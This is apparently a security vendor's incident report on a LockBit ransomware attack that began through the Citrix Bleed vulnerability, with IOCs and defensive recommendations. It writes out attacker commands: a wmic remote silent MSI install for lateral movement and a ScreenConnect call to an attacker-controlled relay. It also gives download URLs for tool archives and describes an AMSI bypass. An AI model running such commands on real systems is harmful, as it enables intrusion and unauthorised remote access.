Citrix Bleed Vulnerability: A Gateway to LockBit Ransomware

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In October 2023, our 24/7 SOC
received alerts that, upon investigation, led us to identify a LockBit ransomware attack. The initial indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com.

The Incident Handling team and the eSentire Threat Response Unit (TRU) further investigated the malicious activity. We assess with high confidence that the threat actor gained the initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allow the attackers to bypass authentication by retrieving the session tokens.

The exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.

We have observed one of the files named “1411.dll” (SHA256: f392f3c875caad2d703fd3d8767272c7c7142c6a2e958f3362cdee28dc3c645d) dropped by the threat actor on multiple machines; the process chain looks like the following:

• cmstart.exe > wfshell.exe > chrome.exe > 1411.dll

The wfshell.exe file is the Citrix WinFrame Shell that manages the environment of a user session, including tasks such as managing drive mappings, shares, printers, and more.

The “1411.dll” payload is a Brute Ratel DLL that was downloaded from the attacker’s hosting server 64.190.113[.]238. Upon running the DLL binary via regsvr32.exe, it initiates communication with the C2 server 173.44.141[.]125 over port 443. The file then gets placed under the C:ProgramData folder.

After dropping the Brute Ratel binary, the threat actor performed a Kerberoasting attack, where an attacker exploits the Kerberos protocol to steal service account credentials by requesting service tickets and then brute forcing their encrypted content offline to reveal the service accounts’ passwords.

“1.msi” (MD5: 3cfed171757ec4d482eaec4bc3ab6c8f) was dropped on another machine that the compromised user had access to. The installer is a ScreenConnect client that is deployed by the threat actor to obtain remote access to the machine and possibly exfiltrate data.

The threat actor attempted to move laterally and drop the ScreenConnect client to another host via WMI with the following command:

• wmic /node:<REDACTED> process call create “msiexec.exe /i C:1.msi /quiet /qn”

Upon executing, the ScreenConnect client connects to an attacker’s-controlled instance via the command:

• ScreenConnect.ClientService.exe “?e=Access&y=Guest&h=instance-lipqpu-relay.screenconnect[.]com&p=443&<REDACTED>

The domain instance-lipqpu-relay.screenconnect[.]com is the attacker-controlled instance.

On another host, we observed the threat actor attempting to retrieve the ZIP archive named “netz.zip” from FileTransfer at hxxps[://]s25[.]filetransfer[.]io/storage/download/LzE9F5nDQ7jj. The folder contained netscan (network discovery tool) and its dependencies (MD5: 495cc657c21814a1d4748ee1d44eced5), as shown in Figure 1.

Approximately two hours later, the threat actor attempted to retrieve the “lbbb.zip” from hxxps[://]s22[.]filetransfer[.]io/storage/download/QSM80MJVDAQS. The contents of the “lbbb.zip” are shown in Figure 2 below.

• LBB.exe – LockBit binary.
• LBB_pass.exe – LockBit binary that requires the passcode to run.
• LBB_PS1.ps1 – partially unobfuscated LockBit PowerShell script to execute the ransomware.
• LBB_PS1_obfuscated.ps1 – obfuscated version of LockBit PowerShell script.
• LBB_PS1_pass – LockBit PowerShell script that requires passcode to run.
• LBB_ReflectiveDll_DllMain.dll – LockBit DLL using Reflective DLL Injection technique that allows a Windows DLL (Dynamic Link Library) to be dynamically loaded from memory, bypassing the standard operating system loader.
• LBB_Rundll32.dll – LockBit DLL ransomware binary.
• LBB_Rundll32_pass.dll – LockBit DLL ransomware binary that requires a passcode for execution.
• Password_dll.txt – instructions on how to run the LockBit DLL binary with passcode. (LBB_Rundll32_pass.dll) as shown in Figure 3. The DLL has the ability to run in Global and Safe Modes; in Safe Mode to bypass AntiVirus and EDR solutions.
• Password_exe.txt – instructions on how to run the LockBit DLL binary with passcode (LBB_pass.exe) as shown in Figure 4. Has the ability to run in the Targeted Mode to encrypt specific folders and paths.
• Password_ps1.txt – instructions on how to run the LockBit PowerShell script (LBB_PS1_pass) with passcode as shown in Figure 5.

For more technical details on LockBit, you can refer to this
article.

The contents of LBB_PS1.ps1 contained the snippet shown in Figure 6.

The script performs the following:

• The script attempts to disable AMSI. It does this by accessing the AmsiUtils class and setting the amsiInitFailed field to true, effectively telling the system that AMSI initialization has failed, and thereby bypassing it.
• Checks the PowerShell version and the architecture of the operating system. If running on a 64-bit system, it launches a new instance of PowerShell in 32-bit mode, possibly to avoid compatibility issues.
• Decodes the obfuscated $data via a custom decoding function where each byte is extracted from the obfuscated data using bitwise AND operation with 0x7F. This operation essentially gets the lowest 7 bits of the integer. The extracted byte is stored in the $dB array. The original integer is then right-shifted by 7 bits (achieved by subtracting the extracted byte and dividing by 0x80). This prepares the next 7 bits of the integer for extraction in the next iteration of the inner loop. After processing all integers, the byte array $dB is then converted into an ASCII string.
• Executes the decoded/deobfuscated data, which is a LockBit DLL binary (MD5: ab41549944d71fbd02deda7bc6ab00eb) as shown in Figure 7.

What did we do?

After receiving alerts, our 24/7 SOC Cyber Analysts took action and blocked the indicators of compromise (IOCs) on all endpoints and network sensors to prevent further spread of the intrusion.

At the same time, we involved our Incident Response (IR) team to determine the full impact of the intrusion.

Meanwhile, our analysts isolated the affected host and informed the client about the suspicious activities, ensuring a comprehensive and coordinated response to the security incident.

What can you learn from this TRU Positive?

• The early detection of ransomware precursor activities, such as unusual Rclone activity and connections to known malicious domains, is crucial. This highlights the need for vigilant monitoring and threat intelligence to identify potential threats before they escalate.
• The exploitation of the Citrix Bleed vulnerability underscores the importance of promptly patching known vulnerabilities.
• The identification of a malicious DLL (1411.dll) initiating from a trusted process (Citrix WinFrame Shell) demonstrates the need for robust endpoint detection and response (EDR) solutions.
• The use of a Kerberoasting attack to steal service account credentials shows how attackers can exploit legitimate functionalities within an environment for malicious purposes.
• The deployment of a ScreenConnect client and the use of Rclone for data exfiltration illustrate common tactics used by attackers for maintaining access and stealing sensitive information. Therefore, implementing controls to monitor and restrict unauthorized remote access and data transfer activities is essential.
• The retrieval of ZIP archives containing malicious tools and ransomware components from a legitimate file transfer service (FileTransfer) highlights how attackers can misuse legitimate services to facilitate their attacks. Organizations should monitor for unusual file transfers and downloads, even from legitimate sources.

Recommendations from our Threat Response Unit (TRU):

• Implement two-factor authentication for all Remote Monitoring and Management (RMM) tools, remote access solutions, VPNs, and other critical software systems. This adds an extra layer of security beyond just passwords.

• Ensure that all remote access accounts and other key system accounts are secured with strong, unique passwords. This reduces the risk of unauthorized access due to compromised credentials.

• Set up ACLs to allow only trusted IPs for accessing your systems. However, if an end customer is roaming or working remotely, they should connect through a VPN to ensure secure access.

• Employees with access to RMM or remote access software should receive specialized training to critically evaluate communications that purport to be from these service providers. This helps in identifying and avoiding phishing attempts.

• Ensure that your IT environment—including networks, endpoints, and logs, both on-premises and in the cloud—is continuously protected by a robust Managed Detection and Response solution. This ensures ongoing monitoring and protection against threats.

• Be aware of the level of response, remediation, and incident handling included in your 24/7 Managed Detection and Response (MDR) service. Knowing the scope of services provided can help in effective and timely response to incidents.

Indicators of Compromise

References

Source: https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware